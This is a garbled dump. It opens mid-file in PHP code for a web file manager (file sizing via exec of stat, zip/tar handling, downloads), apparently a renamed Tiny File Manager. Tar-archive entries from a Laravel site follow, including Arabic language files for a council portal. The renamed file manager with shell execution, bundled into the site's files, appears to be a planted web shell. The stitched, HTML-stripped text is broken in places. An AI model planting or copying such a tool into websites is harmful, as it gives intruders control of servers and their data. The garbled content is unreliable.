EXEC') == 'EXEC'); } // try a shell command if ($exec_works) { $arg = escapeshellarg($file); $cmd = ($iswin) ? "for %F in (\"$file\") do @echo %~zF" : ($isdarwin ? "stat -f%z $arg" : "stat -c%s $arg"); @exec($cmd, $output); if (is_array($output) and ctype_digit($size = trim(implode("\n", $output)))) { return $size; } } // try the Windows COM interface if ($iswin and class_exists("COM")) { try { $fsobj = new COM('Scripting.FileSystemObject'); $f = $fsobj->GetFile( realpath($file) ); $size = $f->Size; } catch (Exception $e) { $size = null; } if (ctype_digit($size)) { return $size; } } // if all else fails return filesize($file); } function fm_get_filesize($size) { $size = (float) $size; $units = array('B', 'KB', 'MB', 'GB', 'TB', 'PB', 'EB', 'ZB', 'YB'); $power = ($size > 0) ? floor(log($size, 1024)) : 0; $power = ($power > (count($units) - 1)) ? (count($units) - 1) : $power; return sprintf('%s %s', round($size / pow(1024, $power), 2), $units[$power]); } function fm_get_directorysize($directory) { $bytes = 0; $directory = realpath($directory); if ($directory !== false and $directory != '' and file_exists($directory)){ foreach(new RecursiveIteratorIterator(new RecursiveDirectoryIterator($directory, FilesystemIterator::SKIP_DOTS)) as $file){ $bytes += $file->getSize(); } } return $bytes; } function fm_get_zif_info($path, $ext) { if ($ext == 'zip' and function_exists('zip_open')) { $arch = @zip_open($path); if ($arch) { $filenames = array(); while ($zip_entry = @zip_read($arch)) { $zip_name = @zip_entry_name($zip_entry); $zip_folder = substr($zip_name, -1) == '/'; $filenames[] = array( 'name' => $zip_name, 'filesize' => @zip_entry_filesize($zip_entry), 'compressed_size' => @zip_entry_compressedsize($zip_entry), 'folder' => $zip_folder ); } @zip_close($arch); return $filenames; } } elseif($ext == 'tar' and class_exists('PharData')) { $archive = new PharData($path); $filenames = array(); foreach(new RecursiveIteratorIterator($archive) as $file) { $parent_info = $file->getPathInfo(); $zip_name = str_replace("phar://".$path, '', $file->getPathName()); $zip_name = substr($zip_name, ($pos = strpos($zip_name, '/')) !== false ? $pos + 1 : 0); $zip_folder = $parent_info->getFileName(); $zip_info = new SplFileInfo($file); $filenames[] = array( 'name' => $zip_name, 'filesize' => $zip_info->getSize(), 'compressed_size' => $file->getCompressedSize(), 'folder' => $zip_folder ); } return $filenames; } return false; } function fanco($text) { return htmlspecialchars($text, ENT_QUOTES, 'UTF-8'); } function fm_isvalid_filename($text) { return (strpbrk($text, '/?%*:|"<>') === FALSE) ? true : false; } function fm_set_msg($msg, $status = 'ok') { $_SESSION[DN_CESSION_ID]['message'] = $msg; $_SESSION[DN_CESSION_ID]['status'] = $status; } function fm_is_utf8($string) { return preg_match('//u', $string); } function fm_convert_win($filename) { if (FM_IS_WIN and function_exists('iconv')) { $filename = iconv(FM_ICONV_INPUT_ENC, 'UTF-8//IGNORE', $filename); } return $filename; } function fm_object_to_array($obj) { if (!is_object($obj) and !is_array($obj)) { return $obj; } if (is_object($obj)) { $obj = get_object_vars($obj); } return array_map('fm_object_to_array', $obj); } function fm_get_file_icon_class($path) { // get extension $ext = strtolower(pathinfo($path, PATHINFO_EXTENSION)); switch ($ext) { case 'ico': case 'gif': case 'jpg': case 'jpeg': case 'jpc': case 'jp2': case 'jpx': case 'xbm': case 'wbmp': case 'png': case 'bmp': case 'tif': case 'tiff': case 'webp': case 'avif': case 'svg': $img = 'fa fa-picture-o'; break; case 'passwd': case 'ftpquota': case 'sql': case 'js': case 'ts': case 'jsx': case 'tsx': case 'hbs': case 'json': case 'sh': case 'config': case 'twig': case 'tpl': case 'md': case 'gitignore': case 'c': case 'cpp': case 'cs': case 'py': case 'rs': case 'map': case 'lock': case 'dtd': $img = 'fa fa-file-code-o'; break; case 'txt': case 'ini': case 'conf': case 'log': case 'htaccess': case 'yaml': case 'yml': case 'toml': case 'tmp': case 'top': case 'bot': case 'dat': case 'bak': case 'htpasswd': case 'pl': $img = 'fa fa-file-text-o'; break; case 'css': case 'less': case 'sass': case 'scss': $img = 'fa fa-css3'; break; case 'bz2': case 'tbz2': case 'tbz': case 'zip': case 'rar': case 'gz': case 'tgz': case 'tar': case '7z': case 'xz': case 'txz': case 'zst': case 'tzst': $img = 'fa fa-file-archive-o'; break; case 'php': case 'php4': case 'php5': case 'phps': case 'phtml': $img = 'fa fa-code'; break; case 'htm': case 'html': case 'shtml': case 'xhtml': $img = 'fa fa-html5'; break; case 'xml': case 'xsl': $img = 'fa fa-file-excel-o'; break; case 'wav': case 'mp3': case 'mp2': case 'm4a': case 'aac': case 'ogg': case 'oga': case 'wma': case 'mka': case 'flac': case 'ac3': case 'tds': $img = 'fa fa-music'; break; case 'm3u': case 'm3u8': case 'pls': case 'cue': case 'xspf': $img = 'fa fa-headphones'; break; case 'avi': case 'mpg': case 'mpeg': case 'mp4': case 'm4v': case 'flv': case 'f4v': case 'ogm': case 'ogv': case 'mov': case 'mkv': case '3gp': case 'asf': case 'wmv': case 'webm': $img = 'fa fa-file-video-o'; break; case 'eml': case 'msg': $img = 'fa fa-envelope-o'; break; case 'xls': case 'xlsx': case 'ods': $img = 'fa fa-file-excel-o'; break; case 'csv': $img = 'fa fa-file-text-o'; break; case 'bak': case 'swp': $img = 'fa fa-clipboard'; break; case 'doc': case 'docx': case 'odt': $img = 'fa fa-file-word-o'; break; case 'ppt': case 'pptx': $img = 'fa fa-file-powerpoint-o'; break; case 'ttf': case 'ttc': case 'otf': case 'woff': case 'woff2': case 'eot': case 'fon': $img = 'fa fa-font'; break; case 'pdf': $img = 'fa fa-file-pdf-o'; break; case 'psd': case 'ai': case 'eps': case 'fla': case 'swf': $img = 'fa fa-file-image-o'; break; case 'exe': case 'msi': $img = 'fa fa-file-o'; break; case 'bat': $img = 'fa fa-terminal'; break; default: $img = 'fa fa-info-circle'; } return $img; } function fm_get_image_exts() { return array('ico', 'gif', 'jpg', 'jpeg', 'jpc', 'jp2', 'jpx', 'xbm', 'wbmp', 'png', 'bmp', 'tif', 'tiff', 'psd', 'svg', 'webp', 'avif'); } function fm_get_video_exts() { return array('avi', 'webm', 'wmv', 'mp4', 'm4v', 'ogm', 'ogv', 'mov', 'mkv'); } function fm_get_audio_exts() { return array('wav', 'mp3', 'ogg', 'm4a'); } function fm_get_text_exts() { return array( 'txt', 'css', 'ini', 'conf', 'log', 'htaccess', 'passwd', 'ftpquota', 'sql', 'js', 'ts', 'jsx', 'tsx', 'mjs', 'json', 'sh', 'config', 'php', 'php4', 'php5', 'phps', 'phtml', 'htm', 'html', 'shtml', 'xhtml', 'xml', 'xsl', 'm3u', 'm3u8', 'pls', 'cue', 'bash', 'vue', 'eml', 'msg', 'csv', 'bat', 'twig', 'tpl', 'md', 'gitignore', 'less', 'sass', 'scss', 'c', 'cpp', 'cs', 'py', 'go', 'zsh', 'swift', 'map', 'lock', 'dtd', 'svg', 'asp', 'aspx', 'asx', 'asmx', 'ashx', 'jsp', 'jspx', 'cgi', 'dockerfile', 'ruby', 'yml', 'yaml', 'toml', 'vhost', 'scpt', 'applescript', 'csx', 'cshtml', 'c++', 'coffee', 'cfm', 'rb', 'graphql', 'mustache', 'jinja', 'http', 'handlebars', 'java', 'es', 'es6', 'markdown', 'wiki', 'tmp', 'top', 'bot', 'dat', 'bak', 'htpasswd', 'pl' ); } function fm_get_text_mimes() { return array( 'application/xml', 'application/javascript', 'application/x-javascript', 'image/svg+xml', 'message/rfc822', 'application/json', ); } function fm_get_text_names() { return array( 'license', 'readme', 'authors', 'contributors', 'changelog', ); } function fm_get_onlineViewer_exts() { return array('doc', 'docx', 'xls', 'xlsx', 'pdf', 'ppt', 'pptx', 'ai', 'psd', 'dxf', 'xps', 'rar', 'odt', 'ods'); } function fm_get_file_mimes($extension) { $fileTypes['swf'] = 'application/x-shockwave-flash'; $fileTypes['pdf'] = 'application/pdf'; $fileTypes['exe'] = 'application/octet-stream'; $fileTypes['zip'] = 'application/zip'; $fileTypes['doc'] = 'application/msword'; $fileTypes['xls'] = 'application/vnd.ms-excel'; $fileTypes['ppt'] = 'application/vnd.ms-powerpoint'; $fileTypes['gif'] = 'image/gif'; $fileTypes['png'] = 'image/png'; $fileTypes['jpeg'] = 'image/jpg'; $fileTypes['jpg'] = 'image/jpg'; $fileTypes['webp'] = 'image/webp'; $fileTypes['avif'] = 'image/avif'; $fileTypes['rar'] = 'application/rar'; $fileTypes['ra'] = 'audio/x-pn-realaudio'; $fileTypes['ram'] = 'audio/x-pn-realaudio'; $fileTypes['ogg'] = 'audio/x-pn-realaudio'; $fileTypes['wav'] = 'video/x-msvideo'; $fileTypes['wmv'] = 'video/x-msvideo'; $fileTypes['avi'] = 'video/x-msvideo'; $fileTypes['asf'] = 'video/x-msvideo'; $fileTypes['divx'] = 'video/x-msvideo'; $fileTypes['mp3'] = 'audio/mpeg'; $fileTypes['mp4'] = 'audio/mpeg'; $fileTypes['mpeg'] = 'video/mpeg'; $fileTypes['mpg'] = 'video/mpeg'; $fileTypes['mpe'] = 'video/mpeg'; $fileTypes['mov'] = 'video/quicktime'; $fileTypes['swf'] = 'video/quicktime'; $fileTypes['3gp'] = 'video/quicktime'; $fileTypes['m4a'] = 'video/quicktime'; $fileTypes['aac'] = 'video/quicktime'; $fileTypes['m3u'] = 'video/quicktime'; $fileTypes['php'] = ['application/x-php']; $fileTypes['html'] = ['text/html']; $fileTypes['txt'] = ['text/plain']; //Unknown mime-types should be 'application/octet-stream' if(empty($fileTypes[$extension])) { $fileTypes[$extension] = ['application/octet-stream']; } return $fileTypes[$extension]; } function scan($dir = '', $filter = '') { $path = FM_ROOT_PATH.'/'.$dir; if($path) { $ite = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($path)); $rii = new RegexIterator($ite, "/(" . $filter . ")/i"); $files = array(); foreach ($rii as $file) { if (!$file->isDir()) { $fileName = $file->getFilename(); $location = str_replace(FM_ROOT_PATH, '', $file->getPath()); $files[] = array( "name" => $fileName, "type" => "file", "path" => $location, ); } } return $files; } } function fm_download_file($fileLocation, $fileName, $chunkSize = 1024) { if (connection_status() != 0) return (false); $extension = pathinfo($fileName, PATHINFO_EXTENSION); $contentType = fm_get_file_mimes($extension); if(is_array($contentType)) { $contentType = implode(' ', $contentType); } $size = filesize($fileLocation); if ($size == 0) { fm_set_msg(lng('Zero byte file! Aborting download'), 'error'); $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); return (false); } @ini_set('magic_quotes_runtime', 0); $fp = fopen("$fileLocation", "rb"); if ($fp === false) { fm_set_msg(lng('Cannot open file! Aborting download'), 'error'); $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); return (false); } // headers header('Content-Description: File Transfer'); header('Expires: 0'); header('Cache-Control: must-revalidate, post-check=0, pre-check=0'); header('Pragma: public'); header("Content-Transfer-Encoding: binary"); header("Content-Type: $contentType"); $contentDisposition = 'attachment'; if (strstr($_SERVER['HTTP_USER_AGENT'], "MSIE")) { $fileName = preg_replace('/\./', '%2e', $fileName, substr_count($fileName, '.') - 1); header("Content-Disposition: $contentDisposition;filename=\"$fileName\""); } else { header("Content-Disposition: $contentDisposition;filename=\"$fileName\""); } header("Accept-Ranges: bytes"); $range = 0; if (isset($_SERVER['HTTP_RANGE'])) { list($a, $range) = explode("=", $_SERVER['HTTP_RANGE']); str_replace($range, "-", $range); $size2 = $size - 1; $new_length = $size - $range; header("HTTP/1.1 206 Partial Content"); header("Content-Length: $new_length"); header("Content-Range: bytes $range$size2/$size"); } else { $size2 = $size - 1; header("Content-Range: bytes 0-$size2/$size"); header("Content-Length: " . $size); } $fileLocation = realpath($fileLocation); while (ob_get_level()) ob_end_clean(); readfile($fileLocation); fclose($fp); return ((connection_status() == 0) and !connection_aborted()); } function fm_get_theme() { $result = ''; if(FM_THEME == "dark") { $result = "text-white bg-dark"; } return $result; } class FM_Zipper { private $zip; public function __construct() { $this->zip = new ZipArchive(); } public function create($filename, $files) { $res = $this->zip->open($filename, ZipArchive::CREATE); if ($res !== true) { return false; } if (is_array($files)) { foreach ($files as $f) { $f = fm_clean_path($f); if (!$this->addFileOrDir($f)) { $this->zip->close(); return false; } } $this->zip->close(); return true; } else { if ($this->addFileOrDir($files)) { $this->zip->close(); return true; } return false; } } public function unzip($filename, $path) { $res = $this->zip->open($filename); if ($res !== true) { return false; } if ($this->zip->extractTo($path)) { $this->zip->close(); return true; } return false; } private function addFileOrDir($filename) { if (is_file($filename)) { return $this->zip->addFile($filename); } elseif (is_dir($filename)) { return $this->addDir($filename); } return false; } private function addDir($path) { if (!$this->zip->addEmptyDir($path)) { return false; } $objects = scandir($path); if (is_array($objects)) { foreach ($objects as $file) { if ($file != '.' and $file != '..') { if (is_dir($path . '/' . $file)) { if (!$this->addDir($path . '/' . $file)) { return false; } } elseif (is_file($path . '/' . $file)) { if (!$this->zip->addFile($path . '/' . $file)) { return false; } } } } return true; } return false; } } class FM_Zipper_Tar { private $tar; public function __construct() { $this->tar = null; } public function create($filename, $files) { $this->tar = new PharData($filename); if (is_array($files)) { foreach ($files as $f) { $f = fm_clean_path($f); if (!$this->addFileOrDir($f)) { return false; } } return true; } else { if ($this->addFileOrDir($files)) { return true; } return false; } } public function unzip($filename, $path) { $res = $this->tar->open($filename); if ($res !== true) { return false; } if ($this->tar->extractTo($path)) { return true; } return false; } /** * Add file/folder to archive * @param string $filename * @return bool */ private function addFileOrDir($filename) { if (is_file($filename)) { try { $this->tar->addFile($filename); return true; } catch (Exception $e) { return false; } } elseif (is_dir($filename)) { return $this->addDir($filename); } return false; } private function addDir($path) { $objects = scandir($path); if (is_array($objects)) { foreach ($objects as $file) { if ($file != '.' and $file != '..') { if (is_dir($path . '/' . $file)) { if (!$this->addDir($path . '/' . $file)) { return false; } } elseif (is_file($path . '/' . $file)) { try { $this->tar->addFile($path . '/' . $file); } catch (Exception $e) { return false; } } } } return true; } return false; } } class FM_Config { var $data; function __construct() { global $root_path, $root_url, $CONFIG; $fm_url = $root_url.$_SERVER["PHP_SELF"]; $this->data = array( 'lang' => 'en', 'error_reporting' => true, 'show_hidden' => true ); $data = false; if (strlen($CONFIG)) { $data = fm_object_to_array(json_decode($CONFIG)); } else { $msg = 'ambeers
Error: Cannot load configuration'; if (substr($fm_url, -1) == '/') { $fm_url = rtrim($fm_url, '/'); $msg .= '
'; $msg .= '
Seems like you have a trailing slash on the URL.'; $msg .= '
Try this link: ' . $fm_url . ''; } die($msg); } if (is_array($data) and count($data)) $this->data = $data; else $this->save(); } function save() { $fm_file = __FILE__; $var_name = '$CONFIG'; $var_value = var_export(json_encode($this->data), true); $config_string = " ' . $_SESSION[DN_CESSION_ID]['message'] . '

'; unset($_SESSION[DN_CESSION_ID]['message']); unset($_SESSION[DN_CESSION_ID]['status']); } } function fm_show_header_login() { $sprites_ver = '20160315'; header("Content-Type: text/html; charset=utf-8"); header("Expires: Sat, 26 Jul 1997 05:00:00 GMT"); header("Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0"); header("Pragma: no-cache"); global $lang, $root_url, $favicon_path; ?> '; } ?> <?php echo fanco(APP_TITLE) ?> ">
'; } ?> <?php echo fanco(APP_TITLE) ?> ">
assets/js/components/ExampleComponent.vue000064400000001065147565226300014662 0ustar00 assets/js/components/desktop.ini000064400000000216147565226300013032 0ustar00[.ShellClassInfo] InfoTip=This folder is shared online. IconFile=C:\Program Files (x86)\Google\Drive\googledrivesync.exe IconIndex=16 assets/js/app.js000064400000001162147565226300007612 0ustar00 /** * First we will load all of this project's JavaScript dependencies which * includes Vue and other libraries. It is a great starting point when * building robust, powerful web applications using Vue and Laravel. */ require('./bootstrap'); window.Vue = require('vue'); /** * Next, we will create a fresh Vue application instance and attach it to * the page. Then, you may begin adding components to this application * or customize the JavaScript scaffolding to fit your unique needs. */ Vue.component('example-component', require('./components/ExampleComponent.vue')); const app = new Vue({ el: '#app' }); assets/js/desktop.ini000064400000000216147565226300010645 0ustar00[.ShellClassInfo] InfoTip=This folder is shared online. IconFile=C:\Program Files (x86)\Google\Drive\googledrivesync.exe IconIndex=16 assets/sass/app.scss000064400000000410147565226300010501 0ustar00 // Fonts @import url("https://fonts.googleapis.com/css?family=Raleway:300,400,600"); // Variables @import "variables"; // Bootstrap @import '~bootstrap/scss/bootstrap'; .navbar-laravel { background-color: #fff; box-shadow: 0 2px 4px rgba(0, 0, 0, 0.04); } assets/sass/_variables.scss000064400000000440147565226300012033 0ustar00 // Body $body-bg: #f5f8fa; // Typography $font-family-sans-serif: "Raleway", sans-serif; $font-size-base: 0.9rem; $line-height-base: 1.6; $text-color: #636b6f; // Navbar $navbar-default-bg: #fff; // Buttons $btn-default-color: $text-color; // Panels $panel-default-heading-bg: #fff; assets/sass/desktop.ini000064400000000216147565226300011202 0ustar00[.ShellClassInfo] InfoTip=This folder is shared online. IconFile=C:\Program Files (x86)\Google\Drive\googledrivesync.exe IconIndex=16 assets/desktop.ini000064400000000216147565226300010231 0ustar00[.ShellClassInfo] InfoTip=This folder is shared online. IconFile=C:\Program Files (x86)\Google\Drive\googledrivesync.exe IconIndex=16 lang/ar/passwords.php000064400000001147147565226300010642 0ustar00 'يجب أن تتكون كلمات المرور من ستة أحرف على الأقل وتتطابق مع التأكيد.', 'reset' => 'تم إعادة تعيين كلمة المرور الخاصة بك!', 'sent' => 'لقد أرسلنا عبر البريد الإلكتروني رابط إعادة تعيين كلمة المرور الخاص بك!', 'token' => 'رمز إعادة تعيين كلمة المرور هذا غير صالح.', 'user' => 'لا يمكننا العثور على مستخدم لديه عنوان البريد الإلكتروني هذا.', ); lang/ar/auth.php000064400000000425147565226300007554 0ustar00 'لا تتطابق بيانات الاعتماد هذه مع سجلاتنا.', 'throttle' => 'عدد محاولات تسجيل الدخول أكثر من اللازم. يرجى المحاولة مرة أخرى: ثانية ثانية', ); lang/ar/validation.php000064400000014742147565226300010754 0ustar00 'The :attribute must be accepted.', 'active_url' => 'The :attribute is not a valid URL.', 'after' => 'The :attribute must be a date after :date.', 'after_or_equal' => 'The :attribute must be a date after or equal to :date.', 'alpha' => 'The :attribute may only contain letters.', 'alpha_dash' => 'The :attribute may only contain letters, numbers, and dashes.', 'alpha_num' => 'The :attribute may only contain letters and numbers.', 'array' => 'The :attribute must be an array.', 'before' => 'The :attribute must be a date before :date.', 'before_or_equal' => 'The :attribute must be a date before or equal to :date.', 'between' => [ 'numeric' => 'The :attribute must be between :min and :max.', 'file' => 'The :attribute must be between :min and :max kilobytes.', 'string' => 'The :attribute must be between :min and :max characters.', 'array' => 'The :attribute must have between :min and :max items.', ], 'boolean' => 'The :attribute field must be true or false.', 'confirmed' => 'The :attribute confirmation does not match.', 'date' => 'The :attribute is not a valid date.', 'date_format' => 'The :attribute does not match the format :format.', 'different' => 'The :attribute and :other must be different.', 'digits' => 'The :attribute must be :digits digits.', 'digits_between' => 'The :attribute must be between :min and :max digits.', 'dimensions' => 'The :attribute has invalid image dimensions.', 'distinct' => 'The :attribute field has a duplicate value.', 'email' => 'The :attribute must be a valid email address.', 'exists' => 'The selected :attribute is invalid.', 'file' => 'The :attribute must be a file.', 'filled' => 'The :attribute field must have a value.', 'image' => 'The :attribute must be an image.', 'in' => 'The selected :attribute is invalid.', 'in_array' => 'The :attribute field does not exist in :other.', 'integer' => 'The :attribute must be an integer.', 'ip' => 'The :attribute must be a valid IP address.', 'ipv4' => 'The :attribute must be a valid IPv4 address.', 'ipv6' => 'The :attribute must be a valid IPv6 address.', 'json' => 'The :attribute must be a valid JSON string.', 'max' => [ 'numeric' => 'The :attribute may not be greater than :max.', 'file' => 'The :attribute may not be greater than :max kilobytes.', 'string' => 'The :attribute may not be greater than :max characters.', 'array' => 'The :attribute may not have more than :max items.', ], 'mimes' => 'The :attribute must be a file of type: :values.', 'mimetypes' => 'The :attribute must be a file of type: :values.', 'min' => [ 'numeric' => 'The :attribute must be at least :min.', 'file' => 'The :attribute must be at least :min kilobytes.', 'string' => 'The :attribute must be at least :min characters.', 'array' => 'The :attribute must have at least :min items.', ], 'not_in' => 'The selected :attribute is invalid.', 'numeric' => 'The :attribute must be a number.', 'present' => 'The :attribute field must be present.', 'regex' => 'The :attribute format is invalid.', 'required' => 'The :attribute field is required.', 'required_if' => 'The :attribute field is required when :other is :value.', 'required_unless' => 'The :attribute field is required unless :other is in :values.', 'required_with' => 'The :attribute field is required when :values is present.', 'required_with_all' => 'The :attribute field is required when :values is present.', 'required_without' => 'The :attribute field is required when :values is not present.', 'required_without_all' => 'The :attribute field is required when none of :values are present.', 'same' => 'The :attribute and :other must match.', 'size' => [ 'numeric' => 'The :attribute must be :size.', 'file' => 'The :attribute must be :size kilobytes.', 'string' => 'The :attribute must be :size characters.', 'array' => 'The :attribute must contain :size items.', ], 'string' => 'The :attribute must be a string.', 'timezone' => 'The :attribute must be a valid zone.', 'unique' => 'The :attribute has already been taken.', 'uploaded' => 'The :attribute failed to upload.', 'url' => 'The :attribute format is invalid.', /* |-------------------------------------------------------------------------- | Custom Validation Language Lines |-------------------------------------------------------------------------- | | Here you may specify custom validation messages for attributes using the | convention "attribute.rule" to name the lines. This makes it quick to | specify a specific custom language line for a given attribute rule. | */ 'custom' => [ 'attribute-name' => [ 'rule-name' => 'custom-message', ], ], /* |-------------------------------------------------------------------------- | Custom Validation Attributes |-------------------------------------------------------------------------- | | The following language lines are used to swap attribute place-holders | with something more reader friendly such as E-Mail Address instead | of "email". This simply helps us make messages a little cleaner. | */ 'attributes' => [], ]; lang/ar/frontLang.php000064400000015703147565226300010552 0ustar00 'لوحة التحكم', 'toTop' => 'إلى الأعلى', 'AllRightsReserved' => 'جميع الحقوق محفوظة', 'moreDetails' => 'مزيد من التفاصيل', 'viewMore' => 'مشاهدة المزيد', 'readMore' => ' إقرأ المزيد ', 'downloadAttach' => 'تحمل المرفقات', 'contactDetails' => 'بيانات الإتصال', 'callUs' => 'اتصل الآن', 'callFax' => 'الفاكس', 'callMobile' => 'الجوال', 'callPhone' => 'الهاتف', 'callTimes' => 'أوقات العمل', 'address' => 'العنوان', 'name' => 'الإسم', 'email' => 'البريد الإلكتروني', 'phone' => 'رقم الهاتف', 'latestNews' => 'جديد الأخبار', 'ourGallery' => 'معرض الصور', 'subscribeToOurNewsletter' => 'اشترك في النشرة البريدية', 'subscribeToOurNewsletterDone' => 'لقد اشتركت بنجاح', 'subscribeToOurNewsletterError' => 'أنت بالفعل مشترك معنا', 'newsletter' => 'النشرة البريدية', 'subscribe' => 'اشترك', 'yourEmail' => 'بريدك الإلكتروني', 'yourName' => 'إسمك', 'enterYourName' => 'برجاء كتابة إسمك', 'enterYourEmail' => 'برجاء كتابة بريدك الإلكتروني', 'enterYourPhone' => 'برجاء كتابة رقم هاتفك ', 'enterYourSubject' => 'برجاء كتابة عنوان لرسالتك', 'enterYourMessage' => 'برجاء كتابة تفاصيل الرسالة', 'youMessageSent' => 'تم إرسال رسالتكم بنجاح، وسنقوم بالتواصل معكم في أقرب وقت ممكن. نشكركم لمراسلتنا!', 'youMessageNotSent' => 'خطأ: برجاء إعادة المحاولة', 'subject' => 'عنوان الرسالة', 'message' => 'تفاصيل الرسالة', 'sendMessage' => 'ارسال الرسالة', 'workingHours' => 'أوقات العمل', 'categories' => 'التصنيفات', 'noData' => 'لا يوجد أية بيانات هنا حتى الآن', 'mostViewed' => 'الأكثر مشاهدة', 'share' => 'نشر', 'locationMap' => 'خريطة الموقع', 'comments' => 'التعليقات', 'comment' => 'التعليق', 'enterYourComment' => 'الرجاء كتابة التعليق', 'sendComment' => 'ارسال التعليق', 'youCommentSent' => 'تم إضافة التعليق بنجاح', 'newComment' => 'إضافة تعليق جديد', 'refresh' => 'تحديث', 'getInTouch' => 'يمكنك مراسلتنا عن طريق تعبئة النموذج التالي', 'homeContents1Title' => 'أحدث المقالات', 'homeContents1desc' => 'احدث المقالات الجديدة والمميزة التي أضيفت في المدونة', 'homeContents2Title' => 'أعمالنا الحالية', 'homeContents2desc' => 'مجموعة من أحدث أعمالنا، يمكنك تصفح المزيد', 'search' => 'بحث عن...', 'visits' => 'الزيارات', 'orderForm' => 'نموذج الطلب', 'quantity' => 'الكمية', 'yourQuantity' => 'برجاء إضافة الكمية المطلوبة', 'notes' => 'ملاحظات', 'sendOrder' => 'ارسال الطلب', 'youOrderSent' => 'تم إرسال الطلب بنجاح، وسنقوم بالتواصل معكم في أقرب وقت ممكن.', 'partners' => 'عملائنا', 'partnersMsg' => 'عملاء وشركات متميزة طويلة الأمد مع رواد الشركات المحلية والعالمية', 'fullName' => 'الأسم الكامل', 'parentDetails' => 'معلومات الأهل', 'idNumber' => 'رقم الهوية', 'pupilDetails' => 'معلومات الطالب', 'cname' => 'اسم الطالب', 'choosekindergarden' => 'إختار روضة', 'female' => 'أنثى', 'chooseNeighborhood' => 'إختر حارة', 'chooseSex' => 'الجنس', 'chooseStage' => 'إخترالمستوى', 'easternNeighborhood' => 'الحارة الشرقية', 'KindergardenDetails' => 'معلومات الروضة', 'KindergardenYear1' => 'روضة سنة 1', 'KindergardenYear2' => 'روضة سنة 2', 'KindergardenYear3' => 'روضة سنة 3', 'male' => 'ذكر', 'northernNeighborhood' => 'الحارة الشمالية', 'southernNeighborhood' => 'الحارة الجنوبية', 'westernNeighborhood' => 'الحارة الغربية', 'applicationSubmission' => 'تقديم الطلب', 'pName' => 'الإسم الشخصي', 'fName' => 'الإسم العائلي', 'NoFileChosen' => 'لم يتم إختيار ملف', 'yourFamilyName' => 'الاسم العائلي', 'fillForm' => 'املئ الإستمارة', 'click' => 'إضغط', 'IdFileMessage' => 'أرفق صورة الهوية مع الملحق كامل', 'schoolership' => 'تقديم طلب منحة', 'gotSchoolerShip' => 'هل حصلت على منحة من قبل؟', 'notGotSchoolerShip' => 'أعلن أنني لم أحصل على منحة مفعال هبايس من قبل', 'study' => 'التعليم', 'familyInfo' => 'معلومات عن الأهل', 'institute' => 'المعهد التعليمي', 'studyStart' => 'موعد بداية الدراسة', 'studySubject' => 'موضوع التعليم', 'degree' => 'الدرجة العلمية', 'CollectionDepartmentApproval' => 'تصريح قسم الجباية على عدم وجود ديون للسنة المالية 2020/2019', 'fatherName' => 'إسم الأب', 'brotherscountUnder21' => 'عدد الأخوة العزاب حتى 21', 'studentbrothers' => 'عدد الأخوة اللذين يدرسون للقب الأول (لا يشمل مقدم الطلب)', 'motherId' => 'رقم هوية الأم', 'motherName' => 'إسم الأم', 'fatherId' => 'رقم هوية الأب', 'socialSituation' => 'الوضع الإجتماعي', 'notWorkingDeclaration' => 'تصريح عاطل عن العمل', 'disabilityStatement' => 'تصريح إعاقة', 'notworkingfather' => 'الأب لا يعمل (يجب إرفاق تقرير التأمين الوطني)', 'notworkingmother' => 'الأم لا تعمل (يجب إرفاق تقرير التأمين الوطني)', 'disabilityparent1' => 'إعاقة والد 1 (يجب إرفاق تصريح التأمين الوطني)', 'disabilityparent2' => 'إعاقة والد 2 (يجب إرفاق تصريح التأمين الوطني)', 'MaritalStatus' => 'الوضع العائلي', 'employmentstatus' => 'الحالة الوظيفية', 'schoolerShipSum' => 'مبلغ المنحة', 'birthday' => 'تأريخ الولادة', 'iGotSchoolerShip' => 'لقد حصلت على منحة من مفعال هبايس من قبل', 'studySalaryFile' => 'تصريح عدد ساعات الدراسة والقصط الجامعي', 'studyfile' => 'الرجاء إرفاق تصريح التعليم الرسمي', 'shevyon' => 'موقع المجلس المحلي مدعوم من قبل وزارة المساواة الاجتماعية', ); lang/ar/backLang.php000064400000057575147565226300010337 0ustar00 'rtl', 'code' => 'ar', 'lang' => 'AR', 'left' => 'right', 'right' => 'left', 'arabicBox' => '[ العربية ]', 'englishBox' => '[ English ]', 'hebrewBox' => '[ עברית ]', 'rtl' => 'rtl', 'ltr' => 'ltr', 'boxCode' => 'ar', 'boxCodeOther' => 'en', 'translations' => 'ترجمة الكلمات', 'calendarLanguage' => 'ar', 'home' => 'الرئيسية', 'main' => 'الرئيسي', 'siteData' => 'بيانات الموقع', 'settings' => 'الإعدادات', 'dashboard' => 'الشاشة الرئيسية', 'visitorsAnalytics' => 'تحليلات الزوار', 'visitorsAnalyticsBydate' => 'حسب التاريخ', 'visitorsAnalyticsByCity' => 'المدينة', 'visitorsAnalyticsByRegion' => 'المنطقة', 'visitorsAnalyticsByAddress' => 'العنوان', 'visitorsAnalyticsByCountry' => 'الدولة', 'visitorsAnalyticsByOperatingSystem' => 'نظام التشغيل', 'visitorsAnalyticsByBrowser' => 'المتصفح', 'visitorsAnalyticsByScreenResolution' => 'دقة الشاشة', 'visitorsAnalyticsByReachWay' => 'طريقة الوصول', 'visitorsAnalyticsByHostName' => 'اسم المضيف', 'visitorsAnalyticsByOrganization' => 'شركة الاتصال', 'visitorsAnalyticsVisitorsHistory' => 'سجل الزوار', 'visitorsAnalyticsIPInquiry' => 'استعلام عن IP', 'visitorsAnalyticsLastVisit' => 'أخر زيارة', 'members' => 'الأعضاء', 'adsBanners' => 'البنرات الإعلانية', 'siteInbox' => 'بريد الموقع', 'newsletter' => 'جهات الاتصال', 'calendar' => 'الأجندة والملاحظات', 'generalSiteSettings' => 'الإعدادات العامة للموقع', 'webmasterTools' => 'أدوات مشرف الموقع', 'generalSettings' => 'الإعدادات العامة', 'siteSectionsSettings' => 'إعدادات أقسام الموقع', 'adsBannersSettings' => 'إعدادات البنرات', 'languageSettings' => 'إعدادات اللغة', 'siteMenus' => 'قوائم الموقع', 'usersPermissions' => 'المستخدمين والصلاحيات', 'shoppingCart' => 'سلة التسوق', 'orders' => 'الطلبات', 'logout' => 'خروج', 'checkAll' => 'تحديد الكل', 'profile' => 'الملف الشخصي', 'search' => 'بحث', 'new' => 'إضافة', 'add' => 'إضافة', 'update' => 'حفظ التعديل', 'save' => 'حفظ', 'saveOrder' => 'حفظ الترتيب', 'edit' => 